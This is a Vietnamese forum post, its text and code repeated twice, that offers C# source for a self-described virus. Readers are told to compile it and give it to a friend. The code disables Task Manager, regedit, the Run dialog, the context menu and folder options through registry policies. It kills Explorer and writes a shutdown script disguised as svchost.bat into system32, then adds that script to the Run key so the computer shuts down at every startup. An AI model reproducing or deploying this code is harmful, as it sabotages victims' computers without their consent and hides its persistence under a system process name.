Cơn Gió
28-03-2012, 10:28 PM
Đây là chương trình viết bằng C# class nhé.
Mình đã để thằng bạn mình test rồi,Các bạn cứ yên tâm.Không có lỗi gì đâu.
Đừng mà debug nhé.
Không là khó mà cứu vãn.
Tính năng của nó là :
- Khóa taskbar
-Regedit
- Khóa chuột phải
........................
Nói tóm lại là cự bật máy nó lại tắt,
code đây , các bạn đóng gói exe lại nhé ! rồi cho bạn mình test
using System;using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32;
using System.IO;
using System.Diagnostics;
namespace TracNghiemCsharp
{
class Program
{
static void Main(string[] args)
{
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer", "NoRun", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\system", "DisableRegistryTools", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\system", "DisableTaskMgr", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer", "NoViewContextMenu", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer", "NoFolderOptions", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "Mr.Tin", 1, Microsoft.Win32.RegistryValueKind.DWord);
StreamWriter sw = new StreamWriter("C:\\windows\\system32\\svchost.bat");
string s = "shutdown/s /f /t 0300 /c " + (char)34 + "Tu dong tat may sau 300 giay" + (char)34;
sw.Write(s.ToString());
sw.Close();
foreach (Process proc in Process.GetProcesses())
{
if (proc.ProcessName == "explorer") proc.Kill();
}
System.Diagnostics.Process.Start("explorer.exe");
System.Diagnostics.Process.Start("shutdown", "/s /f /t 0300 /c " + (char)34 + "Tu dong tat may sau 300 giay" + (char)34);
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\C urrentVersion\\Run", "svchost", "C:\\windows\\system32\\svchost.bat", Microsoft.Win32.RegistryValueKind.String);
Console.Write("Chuc Mung Ban Dinh Con Virus Con Gio ");
Console.ReadLine();
}
}
}
Chúc các bạn có những phút giây vui vẻ!
Mình đã để thằng bạn mình test rồi,Các bạn cứ yên tâm.Không có lỗi gì đâu.
Đừng mà debug nhé.
Không là khó mà cứu vãn.
Tính năng của nó là :
- Khóa taskbar
-Regedit
- Khóa chuột phải
........................
Nói tóm lại là cự bật máy nó lại tắt,
code đây , các bạn đóng gói exe lại nhé ! rồi cho bạn mình test
using System;using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32;
using System.IO;
using System.Diagnostics;
namespace TracNghiemCsharp
{
class Program
{
static void Main(string[] args)
{
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer", "NoRun", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\system", "DisableRegistryTools", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\system", "DisableTaskMgr", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer", "NoViewContextMenu", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\policies\Explorer", "NoFolderOptions", 1, Microsoft.Win32.RegistryValueKind.DWord);
Registry.SetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "Mr.Tin", 1, Microsoft.Win32.RegistryValueKind.DWord);
StreamWriter sw = new StreamWriter("C:\\windows\\system32\\svchost.bat");
string s = "shutdown/s /f /t 0300 /c " + (char)34 + "Tu dong tat may sau 300 giay" + (char)34;
sw.Write(s.ToString());
sw.Close();
foreach (Process proc in Process.GetProcesses())
{
if (proc.ProcessName == "explorer") proc.Kill();
}
System.Diagnostics.Process.Start("explorer.exe");
System.Diagnostics.Process.Start("shutdown", "/s /f /t 0300 /c " + (char)34 + "Tu dong tat may sau 300 giay" + (char)34);
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\C urrentVersion\\Run", "svchost", "C:\\windows\\system32\\svchost.bat", Microsoft.Win32.RegistryValueKind.String);
Console.Write("Chuc Mung Ban Dinh Con Virus Con Gio ");
Console.ReadLine();
}
}
}
Chúc các bạn có những phút giây vui vẻ!